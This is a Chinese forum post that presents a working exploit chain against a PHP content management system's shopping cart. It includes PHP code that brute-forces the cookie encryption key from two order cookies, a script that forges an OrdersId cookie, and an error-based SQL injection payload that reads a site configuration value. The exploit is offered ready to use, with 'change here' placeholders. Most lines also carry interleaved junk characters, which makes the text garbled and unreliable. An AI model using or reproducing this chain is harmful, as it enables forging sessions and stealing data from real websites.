www.xxx.com/plus/search.php?keyword=
7 |. j7 z" g- I5 O8 B在 include/shopcar.class.php中
8 ^4 O; A% O( o: j先看一下这个shopcar类是如何生成cookie的
8 D5 K1 L2 v$ r6 [239 function saveCookie($key,$value)
+ |! B% r! U' L0 d" \* u240 {
: {$ o% A: c @: x5 v241 if(is_array($value))1 h0 K, B2 S. G0 r' ]* C& ^
242 {3 f$ O' ^& U9 a' N" S" O
243 $value = $this->enCrypt($this->enCode($value));& p6 E9 q# f* u* W0 Z/ C* k: N
244 }) r4 r2 g2 T4 T4 c, p, t
245 else
1 T; r1 n. Q! E" M246 {
: A7 t& `% O0 c. [+ Y247 $value = $this->enCrypt($value);& T9 u, e- i3 ~: z7 X
248 }
& z( \, v% x' h. }8 p8 j5 n249 setcookie($key,$value,time()+36000,’/');
, M% u* m3 ?& t) C5 Q8 U+ l% O250 }8 }7 V6 t9 d) {7 o( Q/ r8 L
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
, @8 W3 h/ }2 m186 function enCrypt($txt)( s" ~4 X- k$ Z. r# y% E+ l: x; p
187 {
7 q0 x. h5 W# x3 B2 `188 srand((double)microtime() * 1000000);
2 G$ a; @: q) m7 \1 x' b n189 $encrypt_key = md5(rand(0, 32000));
! B9 V; v& D5 M190 $ctr = 0;/ n1 h* ?4 \* x, P3 Q1 b$ s
191 $tmp = ”;6 C S/ h$ y5 \- [0 K
192 for($i = 0; $i < strlen($txt); $i++)
$ z( `7 _" U' B8 H# O/ Q6 U193 {
; G; X/ z5 A" c1 u194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
0 Q' u2 ]4 b4 }9 b2 z# Y195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
, A) t; v3 d4 ]4 _196 }$ `2 j' a( ^( e6 X. n R
197 return base64_encode($this->setKey($tmp));6 U* u. A, I0 \2 t. Z
198 }) z! t% `5 `' V( [7 o& S# ?4 c3 n
213 function setKey($txt)8 l9 m6 ]/ W4 N$ Y+ ?5 Q6 Q/ O/ [8 g; z. ]
214 {
, z) ~; X6 _# \$ ?& W215 global $cfg_cookie_encode;' g/ C3 m# V* F6 [5 o
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
! b- U' z3 M# q5 p217 $ctr = 0;
' G% s+ V2 O+ K, o7 Y218 $tmp = ”;
6 V3 w5 y, \& r1 n/ t3 g" l219 for($i = 0; $i < strlen($txt); $i++)
! n/ z1 d. K( ~8 ^9 a; W220 {
/ \7 M! M( \% T% a" y4 `221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;! q1 ` W; d! B2 _ _
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];7 }& F* O3 r. j4 t" R
223 }" p& Q' h1 K6 X( d7 f
224 return $tmp;4 \) T- a5 k! p8 d4 T! [) Q+ ~' c
225 }5 O& w6 O7 o( U9 i' c O- [
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
1 k2 O; c' }2 F. P然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
5 Q, f* r) [0 h0 T$ p: H具体代码如下:
( s* S7 ~) T3 m s: [* S' W; s- X<?php
5 l, m9 R) t+ @0 c$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
3 ~0 \0 r% W/ B* d$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here0 B' |7 Q- U+ _# ]2 I' X% S
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here) K- Q6 h3 d6 a# N+ `
function reStrCode($code,$string)
9 g5 q1 L3 Y. J{
0 q# E3 A( h [. K$code = base64_decode($code);, o% b. M, S3 s& @2 N7 i- P, M
$key = “”;
6 p; ^/ `" n: E* Tfor($i=0 ; $i<32 ; $i++) L0 i+ U o% h% ^0 m" x0 I8 d
{8 R3 }! g5 l; G7 O3 Q
$key .= $string[$i] ^ $code[$i];
9 l7 T5 C) f2 O7 M}
9 B2 B" q( m7 |! @return $key;7 F6 l. Q7 K0 O; s k
}( W: W% @$ _! Q# Q8 z% y$ _
function getKeys($cookie,$plantxt)3 J j1 |3 v( K: w
{4 i% W4 a6 A+ L" ~3 A
$tmp = $cookie;" b! _. a* d! t
$results = array();
" d2 _7 C, |+ x$ `+ ifor($j=0 ; $j < 32000; $j++)
' I% L4 O* |" A3 I1 i* ]{/ D% w7 n* X- r4 t- `& V: ~! Y
. r3 m$ w! v, Q& u6 Y
$txt = $plantxt;
; ~' z9 e& o2 L5 e% Z$ctr = 0;
3 L4 w/ P0 x" s7 d. `1 C/ y$tmp = ”;
0 |' t5 j0 K4 c/ \- @6 Y2 Y2 ~$encrypt_key = md5($j);
+ R; x( Y) Z7 P3 ~for($i =0; $i < strlen($txt); $i ++) D( G- n9 S8 j9 W# _( b# B$ D
{
" ]- Y" x* x9 j7 n) [( V7 Q$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
# `8 D3 _) Z) T$ R$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);) [3 h. ?' C4 f2 H2 ]( V. Z* B7 S
}% k& h& e2 g2 }6 W# w8 l% u# e
$string = $tmp;8 ~1 q" h; k+ C! @# A3 ~
$code = $cookie;8 D1 V1 L l" y& `. B. e3 M# K
$result = reStrCode($code,$string);8 y1 C" @1 s- Y1 A
if(eregi(‘^[a-z0-9]+$’,$result))3 A7 E% x5 m2 n! C2 [
{' a4 v- ?# Z" A& r6 H5 _; |
echo $result.”\n”;
! p( N1 [ Q h8 w' L4 I$results[] = $result;
! |* y2 C: O! u% R; B, w, h. i}! \9 ?0 @- }- B. r; G
}
$ x' w, M' ~$ A+ ~0 Wreturn $results;1 n( N" A* E4 f9 R8 z% _
}) g, X3 ^5 G$ N! W
$results1 = getKeys($cookie1,$plantxt);/ z6 ~8 G5 b( B# {3 L- x
$results2 = getKeys($cookie2,$plantxt);
; g* l. {: n% T3 E% @! T$ Rprint “\n——————–real key————————–\n”; Z; ]. o4 O: ^
foreach($results1 as $test1)
, M# a6 P1 @3 W% N$ ~ L% w9 {{6 \ a& G2 m/ P2 B1 i* q
foreach($results2 as $test2)
5 o/ V5 r" z2 }( [7 p{5 l5 J. W$ l; y \$ p3 b. `5 ?
if($test1 == $test2)- G5 ?9 `1 Y3 ?9 y! S# m
{! A% n% ]" n& l e0 V- G4 s X" l
echo $test1.”\n”;, e1 v! ^1 w5 u2 x$ M6 A
}% e7 j- f9 Q& d# n& R8 q# b
}
& s0 g! F; T9 `5 t5 r+ s}+ p8 l# Y6 n1 w$ S: e ^. h( [$ Y
?>
, b# O4 K3 r! |2 Y5 |' ~* bcookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
u, H- ^- u: R2 F/ Kplantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
1 X2 V6 Y2 Q0 S* N5 ^. X然后推算出md5(strtolower($cfg_cookie_encode))1 L% E5 W. s3 |* w- X, u
得到这个key之后,我们就可以构造任意购物车的cookie
- R% m, u) G" o接着看) S; `0 m8 E1 `3 |% [
20 class MemberShops! f( k3 r, X( E) S7 g) w; `
21 {: r9 C7 i5 m- b$ j& C0 M1 J
22 var $OrdersId;3 a9 j2 ^& L, T5 y5 n2 r
23 var $productsId;
. t, d8 p' J, p5 j7 ^24; D7 ?$ f! l$ r8 l k
25 function __construct()8 a5 Q o2 W* @. j8 o( u/ q- E
26 {
' C1 O- h, ?2 G27 $this->OrdersId = $this->getCookie(“OrdersId”);$ w: L- Q* B! p
28 if(empty($this->OrdersId))- K+ E. V8 @1 M: Z" G
29 {
, W0 d2 I8 E9 z Z3 A30 $this->OrdersId = $this->MakeOrders();
$ V& `7 u: n3 Q8 h9 p31 }# K! t- X( v) O, ?
32 }
1 R8 X Y# n9 q( o" F6 _# W8 Z. n发现OrderId是从cookie里面获取的
1 j, o. K0 Y. A7 B2 K6 o: U' S2 w然后* _( Q* P5 {' E+ n9 _! W
/plus/carbuyaction.php中的
3 o, n( ^& Y# A$ z! S29 $cart = new MemberShops();
8 `$ n4 F: A8 q3 i/ z* U2 y39 $OrdersId = $cart->OrdersId; //本次记录的订单号! ~# s1 J3 b# u4 K b8 x5 u( d9 a, C6 K
……
. J9 ]* h c- v# z; _173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
5 l6 G) X# `) { g% @: k7 ^接着我们就可以注入了4 o7 V' n+ G% E- v$ a5 |, d
通过利用下面代码生成cookie:
# U0 d% \8 v( x. D( r, n; ?<?php
* @9 C7 D( Z: j! A4 i' \" s* v9 J$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″; J- ?! G8 L/ I
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here' U5 p7 j: F& I4 |" j0 w
function setKey($txt)3 R* a7 }- `7 Q8 y8 ^, k. Y1 e
{
& L4 [0 I' |) r+ Y3 O* u- bglobal $encrypt_key;2 C6 f; ?+ G5 n0 }- o
$ctr = 0;
- K$ k$ w$ ?' q: n. r$tmp = ”;
: a5 `" D/ r+ c$ A Sfor($i = 0; $i < strlen($txt); $i++)
! I1 m& ?4 ^' Z' J v! D& E{9 B G1 [: q* r \8 l7 ?: M- v
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;9 E! P% X6 X, l- D" E1 _
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];4 x( Q( }! V X$ j' L
}
+ w; r) w" j. v6 h {" D! Hreturn $tmp;( x4 [' x8 ]% C/ s* ^6 {
}
) _. j8 F6 g6 Sfunction enCrypt($txt)5 M% Q% x6 g/ W+ g3 v& _! o: f+ z7 N
{
2 [& y/ Y( b/ \srand((double)microtime() * 1000000);
7 \3 @% A0 r0 {: P X; y7 k$encrypt_key = md5(rand(0, 32000));
0 F3 H- t; x. m& ~# O* ^& q$ctr = 0;
+ o+ W+ a2 ~3 W9 l2 U( V$tmp = ”;5 x- v# ]; v' U! ~; B
for($i = 0; $i < strlen($txt); $i++)
' _+ Y8 z" [$ K8 f" k2 q, Q: t{
; B W7 C ^1 g; f$ r+ g" ?$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
% s1 m0 I, [ o6 C9 {% H8 T& M$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
5 }. d: D6 P- ?9 W8 z3 ~} D7 U+ u; B$ X* b9 t1 g/ p
return base64_encode(setKey($tmp)); ~ E3 o- A- \9 L9 Q7 F0 B0 Q
}; o* a$ x0 w1 |
for($dest =0;$dest = enCrypt($txt);)5 ^. B% {# d; n" p
{
* E7 {( l. }6 n3 u7 U8 n/ nif(!strpos($dest,’+'))
% \# H( W& [" ^" k3 {! g% o{; w; N, a& @4 a
break;% G8 }. [ P+ P1 y4 g1 u
}
f E- Q1 |7 J( E}
4 ]5 Z5 P: R: U! ]echo $dest.”\n”;
2 O& L5 O/ ?1 l?>
* i% @# j4 ` f7 }$ b: M3 `8 z7 K. ^7 f5 |# S# E( w9 Y* N
|
发表于 2013-2-13 23:58:29
收藏
支持
反对